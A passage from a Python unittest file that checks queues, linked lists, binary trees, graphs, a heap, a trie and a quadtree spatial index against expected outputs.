myQueue.enqueue(2)
myQueue.enqueue(10)
myQueue.enqueue(12)
myQueue.enqueue(3)
self.assertEqual(myQueue.dequeue(), 2)
self.assertEqual(myQueue.dequeue(), 10)
self.assertFalse(myQueue.is_empty())
self.assertEqual(myQueue.dequeue(), 12)
self.assertEqual(myQueue.dequeue(), 3)
self.assertTrue(myQueue.is_empty())
def test_deque(self):
myDeque = queue.Deque()
myDeque.insert_front(1) # 1
myDeque.insert_rear(2) # 2 1
myDeque.insert_front(3) # 2 1 3
myDeque.insert_rear(10) # 10 2 1 3
self.assertEqual(myDeque.delete_rear(), 10)
self.assertEqual(myDeque.delete_front(), 3)
class TestLinkedList(unittest.TestCase):
def test_singly_linked_list(self):
List = linked_list.SinglyLinkedList()
List.insert_at_start(3)
List.insert_at_start(5)
List.insert_at_start(2)
List.insert_at_start(1)
List.insert_at_start(4)
List.insert_at_end(6)
expectedResult = [4, 1, 2, 5, 3, 6]
self.assertEqual(List.get_data(), expectedResult)
def test_doubly_linked_list(self):
dll = linked_list.DoublyLinkedList()
dll.insert_at_start(1)
dll.insert_at_start(2)
dll.insert_at_end(3)
dll.insert_at_start(4)
expectedResult = [4, 2, 1, 3]
self.assertEqual(dll.get_data(), expectedResult)
dll.delete(2)
expectedResult = [4, 1, 3]
self.assertEqual(dll.get_data(), expectedResult)
    def test_circular_linked_list(self):
cll = linked_list.CircularLinkedList()
cll.insert(1)
cll.insert(2)
cll.insert(3)
expectedResult = [1, 2, 3]
self.assertEqual(cll.get_data(), expectedResult)
class TestBinaryTree(unittest.TestCase):
def test_binary_tree(self):
root = tree.Node(1)
root.set_left(tree.Node(2))
root.set_right(tree.Node(3))
root.left.set_left(tree.Node(4))
Tree = tree.BinaryTree()
inorderTraversal = Tree.inorder(root)
expectedResult = [4, 2, 1, 3]
self.assertEqual(inorderTraversal, expectedResult)
preorderTraversal = Tree.preorder(root)
expectedResult = [1, 2, 4, 3]
self.assertEqual(preorderTraversal, expectedResult)
postorderTraversal = Tree.postorder(root)
expectedResult = [4, 2, 3, 1]
self.assertEqual(postorderTraversal, expectedResult)
class TestBinarySearchTree(unittest.TestCase):
def test_binary_search_tree(self):
root = tree.BinarySearchTree()
root.insert(10)
root.insert(12)
root.insert(5)
root.insert(4)
root.insert(20)
root.insert(8)
root.insert(7)
root.insert(15)
root.insert(13)
inorder = root.inorder()
preorder = root.preorder()
postorder = root.postorder()
expectedResult = [4, 5, 7, 8, 10, 12, 13, 15, 20]
self.assertEqual(inorder, expectedResult)
expectedResult = [10, 5, 4, 8, 7, 12, 20, 15, 13]
self.assertEqual(preorder, expectedResult)
expectedResult = [4, 7, 8, 5, 13, 15, 20, 12, 10]
self.assertEqual(postorder, expectedResult)
self.assertTrue(root.find(8))
class TestGraph(unittest.TestCase):
def test_topological_sort(self):
myGraph = graph.TopologicalSort()
myGraph.add_edge(5, 2)
myGraph.add_edge(5, 0)
myGraph.add_edge(4, 0)
myGraph.add_edge(4, 1)
myGraph.add_edge(2, 3)
myGraph.add_edge(3, 1)
ans = myGraph.topological_sort()
expectedResult = [5, 4, 2, 3, 1, 0]
self.assertEqual(ans, expectedResult)
def test_cycle_in_directed_graph(self):
myGraph = graph.CheckCycleDirectedGraph()
myGraph.add_edge(0, 1)
myGraph.add_edge(0, 2)
myGraph.add_edge(1, 2)
myGraph.add_edge(2, 0)
myGraph.add_edge(2, 3)
myGraph.add_edge(3, 3)
self.assertTrue(myGraph.check_cycle())
def test_add_edge_in_undirected_graph(self):
myGraph = graph.CheckCycleUndirectedGraph()
myGraph.add_edge(0, 1)
myGraph.add_edge(0, 2)
setFrom0 = myGraph.graph[0]
setFrom1 = myGraph.graph[1]
setFrom2 = myGraph.graph[2]
self.assertIsNotNone(setFrom0)
self.assertIsNotNone(setFrom1)
self.assertIsNotNone(setFrom2)
self.assertIn(1, setFrom0)
self.assertIn(0, setFrom1)
self.assertIn(2, setFrom0)
self.assertIn(0, setFrom2)
def test_cycle_in_undirected_graph(self):
myGraph = graph.CheckCycleUndirectedGraph()
myGraph.add_edge(0, 1)
myGraph.add_edge(0, 2)
myGraph.add_edge(1, 2)
myGraph.add_edge(2, 0)
myGraph.add_edge(2, 3)
myGraph.add_edge(3, 3)
self.assertTrue(myGraph.check_cycle())
def test_creating_weighted_undirected_graph(self):
myGraph = graph.WeightedUndirectedGraph()
myGraph.add_edge(0, 1, 1)
self.assertIn(0, myGraph.graph[1])
self.assertIn(1, myGraph.graph[0])
self.assertEqual(1, myGraph.get_edge_weight(0, 1))
self.assertEqual(1, myGraph.get_edge_weight(1, 0))
myGraph.add_edge(0, 2, 3)
self.assertIn(0, myGraph.graph[2])
self.assertIn(0, myGraph.graph[1])
self.assertIn(1, myGraph.graph[0])
self.assertIn(2, myGraph.graph[0])
self.assertEqual(1, myGraph.get_edge_weight(0, 1))
self.assertEqual(1, myGraph.get_edge_weight(1, 0))
self.assertEqual(3, myGraph.get_edge_weight(0, 2))
self.assertEqual(3, myGraph.get_edge_weight(2, 0))
myGraph.add_edge(2, 3, 7)
self.assertIn(0, myGraph.graph[2])
self.assertIn(3, myGraph.graph[2])
self.assertIn(2, myGraph.graph[3])
self.assertNotIn(0, myGraph.graph[3])
self.assertNotIn(3, myGraph.graph[0])
self.assertEqual(7, myGraph.get_edge_weight(2, 3))
self.assertIsNone(myGraph.get_edge_weight(0, 3))
def test_removing_from_weighted_undirected_graph(self):
myGraph = graph.WeightedUndirectedGraph()
myGraph.add_edge(0, 1, 1)
myGraph.add_edge(0, 2, 1)
myGraph.add_edge(0, 3, 1)
myGraph.add_edge(0, 4, 1)
myGraph.add_edge(4, 5, 1)
myGraph.add_edge(2, 6, 1)
self.assertEqual(1, myGraph.get_edge_weight(0, 1))
self.assertEqual(1, myGraph.get_edge_weight(0, 2))
self.assertEqual(1, myGraph.get_edge_weight(0, 3))
self.assertEqual(1, myGraph.get_edge_weight(0, 4))
self.assertEqual(1, myGraph.get_edge_weight(4, 5))
self.assertEqual(1, myGraph.get_edge_weight(2, 6))
myGraph.remove_edge(0, 1)
self.assertIsNone(myGraph.get_edge_weight(0, 1))
self.assertEqual(1, myGraph.get_edge_weight(0, 2))
self.assertEqual(1, myGraph.get_edge_weight(0, 3))
self.assertEqual(1, myGraph.get_edge_weight(0, 4))
self.assertEqual(1, myGraph.get_edge_weight(4, 5))
self.assertEqual(1, myGraph.get_edge_weight(2, 6))
myGraph.remove_edge(0, 2)
self.assertIsNone(myGraph.get_edge_weight(0, 1))
self.assertIsNone(myGraph.get_edge_weight(0, 2))
self.assertEqual(1, myGraph.get_edge_weight(0, 3))
self.assertEqual(1, myGraph.get_edge_weight(0, 4))
self.assertEqual(1, myGraph.get_edge_weight(4, 5))
self.assertEqual(1, myGraph.get_edge_weight(2, 6))
myGraph.remove_edge(0)
self.assertIsNone(myGraph.get_edge_weight(0, 1))
self.assertIsNone(myGraph.get_edge_weight(0, 2))
self.assertIsNone(myGraph.get_edge_weight(0, 3))
self.assertIsNone(myGraph.get_edge_weight(0, 4))
self.assertEqual(1, myGraph.get_edge_weight(4, 5))
self.assertEqual(1, myGraph.get_edge_weight(2, 6))
def test_gridify_weighted_undirected_graph(self):
rt2 = 1.4142135623730951
myGraph = graph.WeightedUndirectedGraph()
myGraph.gridify(4, 1)
self.assertEqual(1, myGraph.get_edge_weight((0, 0), (0, 1)))
self.assertAlmostEqual(rt2, myGraph.get_edge_weight((0, 0), (1, 1)))
self.assertIsNone(myGraph.get_edge_weight((0, 0), (2, 0)))
self.assertEqual(1, myGraph.get_edge_weight((2, 3), (3, 3)))
self.assertIsNone(myGraph.get_edge_weight((3, 3), (3, 4)))
class TestHeap(unittest.TestCase):
def test_heap(self):
myHeap = heap.Heap()
myHeap.insert(6)
myHeap.insert(3)
myHeap.insert(5)
myHeap.insert(12)
myHeap.insert(1)
expectedResult = [1, 3, 5, 12, 6]
self.assertEqual(myHeap.queue, expectedResult)
self.assertEqual(myHeap.pop(), 1)
expectedResult = [3, 5, 12, 6]
self.assertEqual(myHeap.queue, expectedResult)
self.assertEqual(myHeap.pop(), 3)
expectedResult = [5, 12, 6]
self.assertEqual(myHeap.queue, expectedResult)
self.assertEqual(myHeap.pop(), 5)
expectedResult = [6, 12]
self.assertEqual(myHeap.queue, expectedResult)
self.assertEqual(myHeap.pop(), 6)
expectedResult = [12]
self.assertEqual(myHeap.queue, expectedResult)
self.assertEqual(myHeap.pop(), 12)
expectedResult = []
self.assertEqual(myHeap.queue, expectedResult)
class TestTrie(unittest.TestCase):
    def test_trie(self):
myTrie = trie.Trie()
myTrie.insert("the")
myTrie.insert("turtle")
myTrie.insert("thesaurus")
myTrie.insert("chocolate")
myTrie.insert("flying")
self.assertEqual(myTrie.find_words("th"), ["the", "thesaurus"])
self.assertEqual(myTrie.find_words("e"), None)
self.assertEqual(myTrie.search("chocolate"), True)
self.assertEqual(myTrie.search("flying"), True)
self.assertEqual(myTrie.search("walking"), False)
class TestQuadTreeNode(unittest.TestCase):
def setUp(self):
self.rect1 = rect2.Rect2(1, 1, vector2.Vector2(2, 2))
def test_constructor(self):
ent = quadtree.QuadTreeEntity(self.rect1)
self.assertIsNotNone(ent.aabb)
self.assertEqual(1, ent.aabb.width)
self.assertEqual(1, ent.aabb.height)
self.assertEqual(2, ent.aabb.mincorner.x)
self.assertEqual(2, ent.aabb.mincorner.y)
def test_repr(self):
ent = quadtree.QuadTreeEntity(self.rect1)
exp = (
"quadtreeentity(aabb=rect2(width=1, height=1, mincorner=vector2(x=2, y=2)))"
)
self.assertEqual(exp, repr(ent))
def test_str(self):
ent = quadtree.QuadTreeEntity(self.rect1)
exp = "entity(at rect(1x1 at <2, 2>))"
self.assertEqual(exp, str(ent))
class TestQuadTree(unittest.TestCase):
def setUp(self):
self.big_rect = rect2.Rect2(1000, 1000)
self.big_rect_sub_1 = rect2.Rect2(500, 500)
self.big_rect_sub_2 = rect2.Rect2(500, 500, vector2.Vector2(500, 0))
self.big_rect_sub_3 = rect2.Rect2(500, 500, vector2.Vector2(500, 500))
self.big_rect_sub_4 = rect2.Rect2(500, 500, vector2.Vector2(0, 500))
random.seed()
def test_constructor(self):
_tree = quadtree.QuadTree(64, 5, self.big_rect)
self.assertEqual(64, _tree.bucket_size)
self.assertEqual(5, _tree.max_depth)
self.assertEqual(1000, _tree.location.width)
self.assertEqual(1000, _tree.location.height)
self.assertEqual(0, _tree.location.mincorner.x)
self.assertEqual(0, _tree.location.mincorner.y)
self.assertEqual(0, _tree.depth)
self.assertIsNotNone(_tree.entities)
self.assertEqual(0, len(_tree.entities))
self.assertIsNone(_tree.children)
def test_get_quadrant(self):
_tree = quadtree.QuadTree(64, 5, self.big_rect)
ent1 = quadtree.QuadTreeEntity(rect2.Rect2(5, 5, vector2.Vector2(320, 175)))
quad1 = _tree.get_quadrant(ent1)
self.assertEqual(0, quad1)
ent2 = quadtree.QuadTreeEntity(rect2.Rect2(5, 5, vector2.Vector2(600, 450)))
quad2 = _tree.get_quadrant(ent2)
self.assertEqual(1, quad2)
ent3 = quadtree.QuadTreeEntity(rect2.Rect2(5, 5, vector2.Vector2(700, 950)))
quad3 = _tree.get_quadrant(ent3)
self.assertEqual(2, quad3)
ent4 = quadtree.QuadTreeEntity(rect2.Rect2(5, 5, vector2.Vector2(0, 505)))
quad4 = _tree.get_quadrant(ent4)
self.assertEqual(3, quad4)
def test_get_quadrant_none(self):
_tree = quadtree.QuadTree(64, 5, self.big_rect)
ent1 = quadtree.QuadTreeEntity(rect2.Rect2(5, 5, vector2.Vector2(497, 150)))
self.assertEqual(-1, _tree.get_quadrant(ent1))
ent2 = quadtree.QuadTreeEntity(rect2.Rect2(5, 5, vector2.Vector2(800, 499)))
self.assertEqual(-1, _tree.get_quadrant(ent2))
ent3 = quadtree.QuadTreeEntity(rect2.Rect2(15, 15, vector2.Vector2(486, 505)))
self.assertEqual(-1, _tree.get_quadrant(ent3))
ent4 = quadtree.QuadTreeEntity(rect2.Rect2(5, 20, vector2.Vector2(15, 490)))
self.assertEqual(-1, _tree.get_quadrant(ent4))
ent5 = quadtree.QuadTreeEntity(rect2.Rect2(17, 34, vector2.Vector2(485, 470)))
self.assertEqual(-1, _tree.get_quadrant(ent5))
def test_get_quadrant_shifted(self):
_tree = quadtree.QuadTree(64, 5, self.big_rect_sub_3)
ent1 = quadtree.QuadTreeEntity(rect2.Rect2(5, 5, vector2.Vector2(515, 600)))
self.assertEqual(0, _tree.get_quadrant(ent1))
ent2 = quadtree.QuadTreeEntity(rect2.Rect2(5, 5, vector2.Vector2(800, 550)))
self.assertEqual(1, _tree.get_quadrant(ent2))
ent3 = quadtree.QuadTreeEntity(rect2.Rect2(5, 5, vector2.Vector2(950, 850)))
self.assertEqual(2, _tree.get_quadrant(ent3))
ent4 = quadtree.QuadTreeEntity(rect2.Rect2(5, 5, vector2.Vector2(515, 751)))
self.assertEqual(3, _tree.get_quadrant(ent4))
def test_get_quadrant_0_shifted(self):
_tree = quadtree.QuadTree(
64, 5, rect2.Rect2(500, 800, vector2.Vector2(200, 200))
)
ent1 = quadtree.QuadTreeEntity(rect2.Rect2(5, 10, vector2.Vector2(445, 224)))
self.assertEqual(-1, _tree.get_quadrant(ent1))
ent2 = quadtree.QuadTreeEntity(rect2.Rect2(11, 17, vector2.Vector2(515, 585)))
self.assertEqual(-1, _tree.get_quadrant(ent2))
ent3 = quadtree.QuadTreeEntity(rect2.Rect2(20, 20, vector2.Vector2(440, 700)))
self.assertEqual(-1, _tree.get_quadrant(ent3))
ent4 = quadtree.QuadTreeEntity(rect2.Rect2(15, 15, vector2.Vector2(215, 590)))
self.assertEqual(-1, _tree.get_quadrant(ent4))
ent5 = quadtree.QuadTreeEntity(rect2.Rect2(7, 12, vector2.Vector2(449, 589)))
self.assertEqual(-1, _tree.get_quadrant(ent5))
def test_split_empty(self):
_tree1 = quadtree.QuadTree(64, 5, self.big_rect)
self.assertIsNone(_tree1.children)
_tree1.split()
self.assertIsNotNone(_tree1.children)
self.assertEqual(4, len(_tree1.children))
self.assertEqual(500, _tree1.children[0].location.width)
self.assertEqual(500, _tree1.children[0].location.height)
self.assertEqual(0, _tree1.children[0].location.mincorner.x)
self.assertEqual(0, _tree1.children[0].location.mincorner.y)
self.assertEqual(1, _tree1.children[0].depth)
self.assertEqual(64, _tree1.children[0].bucket_size)
self.assertEqual(5, _tree1.children[0].max_depth)
self.assertEqual(500, _tree1.children[1].location.width)
self.assertEqual(500, _tree1.children[1].location.height)
self.assertEqual(500, _tree1.children[1].location.mincorner.x)
self.assertEqual(0, _tree1.children[1].location.mincorner.y)
self.assertEqual(500, _tree1.children[2].location.width)
self.assertEqual(500, _tree1.children[2].location.height)
self.assertEqual(500, _tree1.children[2].location.mincorner.x)
self.assertEqual(500, _tree1.children[2].location.mincorner.y)
self.assertEqual(500, _tree1.children[3].location.width)
self.assertEqual(500, _tree1.children[3].location.height)
self.assertEqual(0, _tree1.children[3].location.mincorner.x)
self.assertEqual(500, _tree1.children[3].location.mincorner.y)
# bottom-right
_tree2 = _tree1.children[2]
_tree2.split()
self.assertEqual(250, _tree2.children[0].location.width)
self.assertEqual(250, _tree2.children[0].location.height)
self.assertEqual(500, _tree2.children[0].location.mincorner.x)
self.assertEqual(500, _tree2.children[0].location.mincorner.y)
self.assertEqual(2, _tree2.children[0].depth)
self.assertEqual(250, _tree2.children[1].location.width)
self.assertEqual(250, _tree2.children[1].location.height)
self.assertEqual(750, _tree2.children[1].location.mincorner.x)
self.assertEqual(500, _tree2.children[1].location.mincorner.y)
self.assertEqual(250, _tree2.children[2].location.width)
self.assertEqual(250, _tree2.children[2].location.height)
self.assertEqual(750, _tree2.children[2].location.mincorner.x)
self.assertEqual(750, _tree2.children[2].location.mincorner.y)
self.assertEqual(250, _tree2.children[3].location.width)
self.assertEqual(250, _tree2.children[3].location.height)
self.assertEqual(500, _tree2.children[3].location.mincorner.x)
self.assertEqual(750, _tree2.children[3].location.mincorner.y)
def test_split_entities(self):
ent1 = quadtree.QuadTreeEntity(rect2.Rect2(5, 5, vector2.Vector2(50, 50)))
ent2 = quadtree.QuadTreeEntity(rect2.Rect2(5, 5, vector2.Vector2(550, 75)))
ent3 = quadtree.QuadTreeEntity(rect2.Rect2(5, 5, vector2.Vector2(565, 585)))
ent4 = quadtree.QuadTreeEntity(rect2.Rect2(5, 5, vector2.Vector2(95, 900)))
ent5 = quadtree.QuadTreeEntity(rect2.Rect2(10, 10, vector2.Vector2(495, 167)))
_tree = quadtree.QuadTree(
64, 5, self.big_rect, entities=[ent1, ent2, ent3, ent4, ent5]
)
_tree.split()
self.assertEqual(1, len(_tree.children[0].entities))
self.assertEqual(50, _tree.children[0].entities[0].aabb.mincorner.x)
self.assertEqual(50, _tree.children[0].entities[0].aabb.mincorner.y)
self.assertEqual(1, len(_tree.children[1].entities))
self.assertEqual(550, _tree.children[1].entities[0].aabb.mincorner.x)
self.assertEqual(75, _tree.children[1].entities[0].aabb.mincorner.y)
self.assertEqual(1, len(_tree.children[2].entities))
self.assertEqual(565, _tree.children[2].entities[0].aabb.mincorner.x)
self.assertEqual(585, _tree.children[2].entities[0].aabb.mincorner.y)
self.assertEqual(1, len(_tree.children[3].entities))
self.assertEqual(95, _tree.children[3].entities[0].aabb.mincorner.x)
self.assertEqual(900, _tree.children[3].entities[0].aabb.mincorner.y)
self.assertEqual(1, len(_tree.entities))
self.assertEqual(495, _tree.entities[0].aabb.mincorner.x)
self.assertEqual(167, _tree.entities[0].aabb.mincorner.y)
_tree2 = _tree.children[3]
_tree2.split()
for i in range(3):
self.assertEqual(0, len(_tree2.children[i].entities), msg="i={}".format(i))
self.assertEqual(1, len(_tree2.children[3].entities))
self.assertEqual(95, _tree2.children[3].entities[0].aabb.mincorner.x)
self.assertEqual(900, _tree2.children[3].entities[0].aabb.mincorner.y)
# note for test_think and test_insert we're testing the worst-case scenario
# for a quad tree (everythings all bunched up in a corner) hence the instant
# flow to max depth. this case is why max_depth is necessary. To see why you
# don't need that much max_depth, the rect sizes are
# 1000 (depth 0), 500 (depth 1), 250 (depth 2), 125 (depth 3), 62.5 (depth 4),
# 31.25 (depth 5), 15.625 (depth 6), etc. As you can see, they would have to be
# extremely bunched (or stacked) and tiny to actually cause a stack overflow (in the
# examples it's only 6 deep), but the quadtree isn't improving anything
# (even at 1000x1000 world!) past depth 5 or so.
def test_think(self):
ent1 = quadtree.QuadTreeEntity(rect2.Rect2(5, 5, vector2.Vector2(15, 15)))
ent2 = quadtree.QuadTreeEntity(rect2.Rect2(5, 5, vector2.Vector2(20, 20)))
ent3 = quadtree.QuadTreeEntity(rect2.Rect2(5, 5, vector2.Vector2(0, 0)))
ent4 = quadtree.QuadTreeEntity(rect2.Rect2(5, 5, vector2.Vector2(5, 0)))
ent5 = quadtree.QuadTreeEntity(rect2.Rect2(5, 5, vector2.Vector2(0, 5)))
_tree = quadtree.QuadTree(
2, 2, self.big_rect, entities=[ent1, ent2, ent3, ent4, ent5]
)
_tree.think(True)
self.assertIsNotNone(_tree.children) # depth 1
self.assertIsNotNone(_tree.children[0].children) # depth 2
self.assertIsNone(
_tree.children[0].children[0].children
) # depth 3 shouldn't happen because
self.assertEqual(
5, len(_tree.children[0].children[0].entities)
) # max_depth reached
_tree2 = quadtree.QuadTree(2, 2, self.big_rect, entities=[ent1, ent2])
_tree2.think(True)
self.assertIsNone(_tree2.children)
def test_insert(self):
_tree = quadtree.QuadTree(2, 2, self.big_rect)
_tree.insert_and_think(
quadtree.QuadTreeEntity(rect2.Rect2(5, 5, vector2.Vector2(15, 15)))
)
self.assertIsNone(_tree.children)
_tree.insert_and_think(
quadtree.QuadTreeEntity(rect2.Rect2(5, 5, vector2.Vector2(20, 20)))
)
self.assertIsNone(_tree.children)
_tree.insert_and_think(
quadtree.QuadTreeEntity(rect2.Rect2(5, 5, vector2.Vector2(0, 0)))
)
self.assertIsNotNone(_tree.children) # depth 1
self.assertIsNotNone(_tree.children[0].children) # depth 2
self.assertIsNone(
_tree.children[0].children[0].children
) # depth 3 shouldn't happen because
self.assertEqual(
3, len(_tree.children[0].children[0].entities)
) # max_depth reached
def test_retrieve(self):
_tree = quadtree.QuadTree(2, 2, self.big_rect)
ent1 = quadtree.QuadTreeEntity(rect2.Rect2(5, 5, vector2.Vector2(25, 25)))
_tree.insert_and_think(ent1)
retr = _tree.retrieve_collidables(ent1)
self.assertIsNotNone(retr)
self.assertEqual(1, len(retr))
self.assertEqual(25, retr[0].aabb.mincorner.x)
self.assertEqual(25, retr[0].aabb.mincorner.y)
# note this is not nicely in a quadrant
ent2 = quadtree.QuadTreeEntity(rect2.Rect2(20, 10, vector2.Vector2(490, 300)))
_tree.insert_and_think(ent2)
retr = _tree.retrieve_collidables(ent1)
self.assertIsNotNone(retr)
self.assertEqual(
2, len(retr)
) # both ent1 and ent2 are "collidable" in this quad tree
# this should cause a split (bucket_size)
ent3 = quadtree.QuadTreeEntity(rect2.Rect2(15, 10, vector2.Vector2(700, 450)))
_tree.insert_and_think(ent3)
ent4 = quadtree.QuadTreeEntity(rect2.Rect2(5, 5, vector2.Vector2(900, 900)))
_tree.insert_and_think(ent4)
# ent1 should collide with ent1 or ent2
# ent2 with ent1 or ent2, or ent3
# ent3 with ent2 or ent3
# ent4 with ent2 or ent4
retr = _tree.retrieve_collidables(ent1)
self.assertIsNotNone(retr)
self.assertEqual(2, len(retr))
self.assertIsNotNone(
next((e for e in retr if e.aabb.mincorner.x == 25), None), str(retr)
)
self.assertIsNotNone(
next((e for e in retr if e.aabb.mincorner.x == 490), None), str(retr)
)
retr = _tree.retrieve_collidables(ent2)
self.assertEqual(3, len(retr))
self.assertIsNotNone(
next((e for e in retr if e.aabb.mincorner.x == 25), None), str(retr)
)
self.assertIsNotNone(
next((e for e in retr if e.aabb.mincorner.x == 490), None), str(retr)
)
self.assertIsNotNone(
next((e for e in retr if e.aabb.mincorner.x == 700), None), str(retr)
)
retr = _tree.retrieve_collidables(ent3)
self.assertEqual(2, len(retr))
self.assertIsNotNone(
next((e for e in retr if e.aabb.mincorner.x == 490), None), str(retr)
)
self.assertIsNotNone(
next((e for e in retr if e.aabb.mincorner.x == 700), None), str(retr)
)
retr = _tree.retrieve_collidables(ent4)
self.assertEqual(2, len(retr))
self.assertIsNotNone(
next((e for e in retr if e.aabb.mincorner.x == 900), None), str(retr)
)
self.assertIsNotNone(
next((e for e in retr if e.aabb.mincorner.x == 490), None), str(retr)
)
def test_ents_per_depth(self):
_tree = quadtree.QuadTree(3, 5, self.big_rect)
_tree.insert_and_think(
quadtree.QuadTreeEntity(rect2.Rect2(5, 5, vector2.Vector2(75, 35)))
)
self.assertDictEqual({0: 1}, _tree.find_entities_per_depth())
_tree.insert_and_think(
quadtree.QuadTreeEntity(rect2.Rect2(5, 5, vector2.Vector2(300, 499)))
)
self.assertDictEqual({0: 2}, _tree.find_entities_per_depth())
_tree.insert_and_think(
quadtree.QuadTreeEntity(rect2.Rect2(5, 5, vector2.Vector2(800, 600)))
)
self.assertDictEqual({0: 3}, _tree.find_entities_per_depth())
_tree.insert_and_think(
quadtree.QuadTreeEntity(rect2.Rect2(5, 5, vector2.Vector2(450, 300)))
)
self.assertDictEqual({0: 1, 1: 3}, _tree.find_entities_per_depth())
_tree.insert_and_think(
quadtree.QuadTreeEntity(rect2.Rect2(5, 5, vector2.Vector2(150, 100)))
)
self.assertDictEqual({0: 1, 1: 4}, _tree.find_entities_per_depth())
_tree.insert_and_think(
quadtree.QuadTreeEntity(rect2.Rect2(5, 5, vector2.Vector2(80, 40)))
)
self.assertDictEqual({0: 1, 1: 1, 2: 4}, _tree.find_entities_per_depth())
def test_nodes_per_depth(self):
_tree = quadtree.QuadTree(1, 5, self.big_rect)
_tree.insert_and_think(
quadtree.QuadTreeEntity(rect2.Rect2(5, 5, vector2.Vector2(50, 50)))
)
self.assertDictEqual({0: 1}, _tree.find_nodes_per_depth())
_tree.insert_and_think(
quadtree.QuadTreeEntity(rect2.Rect2(5, 5, vector2.Vector2(450, 450)))
)
self.assertDictEqual({0: 1, 1: 4, 2: 4}, _tree.find_nodes_per_depth())
_tree.insert_and_think(
quadtree.QuadTreeEntity(rect2.Rect2(5, 5, vector2.Vector2(550, 550)))
)
self.assertDictEqual({0: 1, 1: 4, 2: 4}, _tree.find_nodes_per_depth())
_tree.insert_and_think(
quadtree.QuadTreeEntity(rect2.Rect2(5, 5, vector2.Vector2(850, 550)))
)
self.assertDictEqual({0: 1, 1: 4, 2: 8}, _tree.find_nodes_per_depth())
def test_sum_ents(self):
# it shouldn't matter where we put entities in, adding entities
# to a quadtree should increment this number by 1. So lets fuzz!
_tree = quadtree.QuadTree(64, 5, self.big_rect)
for i in range(1000):
w = random.randrange(1, 10)
h = random.randrange(1, 10)
x = random.uniform(0, 1000 - w)
y = random.uniform(0, 1000 - h)
ent = quadtree.QuadTreeEntity(rect2.Rect2(w, h, vector2.Vector2(x, y)))
_tree.insert_and_think(ent)
# avoid calculating sum every loop which would take way too long.
# on average, try to sum about 50 times total (5% of the time),
# evenly split between both ways of summing
rnd = random.random()
if rnd > 0.95 and rnd <= 0.975:
_sum = _tree.sum_entities()
self.assertEqual(i + 1, _sum)
elif rnd > 0.975:
_sum = _tree.sum_entities(_tree.find_entities_per_depth())
self.assertEqual(i + 1, _sum)
def test_avg_ents_per_leaf(self):
_tree = quadtree.QuadTree(3, 5, self.big_rect)
_tree.insert_and_think(
quadtree.QuadTreeEntity(rect2.Rect2(5, 5, vector2.Vector2(75, 35)))
)
self.assertEqual(1, _tree.calculate_avg_ents_per_leaf()) # 1 ent on 1 leaf
_tree.insert_and_think(
quadtree.QuadTreeEntity(rect2.Rect2(5, 5, vector2.Vector2(300, 499)))
)
self.assertEqual(2, _tree.calculate_avg_ents_per_leaf()) # 2 ents 1 leaf
_tree.insert_and_think(
quadtree.QuadTreeEntity(rect2.Rect2(5, 5, vector2.Vector2(800, 600)))
)
self.assertEqual(3, _tree.calculate_avg_ents_per_leaf()) # 3 ents 1 leaf
_tree.insert_and_think(
quadtree.QuadTreeEntity(rect2.Rect2(5, 5, vector2.Vector2(450, 300)))
)
self.assertEqual(
0.75, _tree.calculate_avg_ents_per_leaf()
) # 3 ents 4 leafs (1 misplaced)
_tree.insert_and_think(
quadtree.QuadTreeEntity(rect2.Rect2(5, 5, vector2.Vector2(150, 100)))
)
self.assertEqual(
1, _tree.calculate_avg_ents_per_leaf()
) # 4 ents 4 leafs (1 misplaced)
_tree.insert_and_think(
quadtree.QuadTreeEntity(rect2.Rect2(5, 5, vector2.Vector2(450, 450)))
)
self.assertAlmostEqual(
5 / 7, _tree.calculate_avg_ents_per_leaf()
) # 5 ents 7 leafs (1 misplaced)
def test_misplaced_ents(self):
_tree = quadtree.QuadTree(3, 5, self.big_rect)
_tree.insert_and_think(
quadtree.QuadTreeEntity(rect2.Rect2(5, 5, vector2.Vector2(75, 35)))
)
self.assertEqual(
0, _tree.calculate_weight_misplaced_ents()
) # 0 misplaced, 1 total
_tree.insert_and_think(
quadtree.QuadTreeEntity(rect2.Rect2(5, 5, vector2.Vector2(300, 499)))
)
self.assertEqual(
0, _tree.calculate_weight_misplaced_ents()
) # 0 misplaced, 2 total
_tree.insert_and_think(
quadtree.QuadTreeEntity(rect2.Rect2(5, 5, vector2.Vector2(800, 600)))
)
self.assertEqual(
0, _tree.calculate_weight_misplaced_ents()
) # 0 misplaced 3 total
_tree.insert_and_think(
quadtree.QuadTreeEntity(rect2.Rect2(5, 5, vector2.Vector2(550, 700)))
)
self.assertAlmostEqual(
1, _tree.calculate_weight_misplaced_ents()
) # 1 misplaced (1 deep), 4 total
_tree.insert_and_think(
quadtree.QuadTreeEntity(rect2.Rect2(5, 5, vector2.Vector2(900, 900)))
)
self.assertAlmostEqual(
4 / 5, _tree.calculate_weight_misplaced_ents()
) # 1 misplaced (1 deep), 5 total
_tree.insert_and_think(
quadtree.QuadTreeEntity(rect2.Rect2(5, 5, vector2.Vector2(950, 950)))
)
self.assertAlmostEqual(
8 / 6, _tree.calculate_weight_misplaced_ents()
) # 1 misplaced (2 deep), 6 total
def test_repr(self):
_tree = quadtree.QuadTree(1, 5, rect2.Rect2(100, 100))
_tree.insert_and_think(
quadtree.QuadTreeEntity(rect2.Rect2(2, 2, vector2.Vector2(5, 5)))
)
_tree.insert_and_think(
quadtree.QuadTreeEntity(rect2.Rect2(2, 2, vector2.Vector2(95, 5)))
)
_olddiff = self.maxDiff
def cleanup(self2=self):
self2.maxDiff = _olddiff
self.addCleanup(cleanup)
self.maxDiff = None
self.assertEqual(
"quadtree(bucket_size=1, max_depth=5, location=rect2(width=100, height=100, mincorner=vector2(x=0, y=0)), depth=0, entities=[], children=[quadtree(bucket_size=1, max_depth=5, location=rect2(width=50.0, height=50.0, mincorner=vector2(x=0, y=0)), depth=1, entities=[quadtreeentity(aabb=rect2(width=2, height=2, mincorner=vector2(x=5, y=5)))], children=None), quadtree(bucket_size=1, max_depth=5, location=rect2(width=50.0, height=50.0, mincorner=vector2(x=50.0, y=0)), depth=1, entities=[quadtreeentity(aabb=rect2(width=2, height=2, mincorner=vector2(x=95, y=5)))], children=None), quadtree(bucket_size=1, max_depth=5, location=rect2(width=50.0, height=50.0, mincorner=vector2(x=50.0, y=50.0)), depth=1, entities=[], children=None), quadtree(bucket_size=1, max_depth=5, location=rect2(width=50.0, height=50.0, mincorner=vector2(x=0, y=50.0)), depth=1, entities=[], children=None)])",
repr(_tree),
)
def test_str(self):
_tree = quadtree.QuadTree(1, 5, rect2.Rect2(100, 100))
_tree.insert_and_think(
quadtree.QuadTreeEntity(rect2.Rect2(2, 2, vector2.Vector2(5, 5)))
)
_tree.insert_and_think(
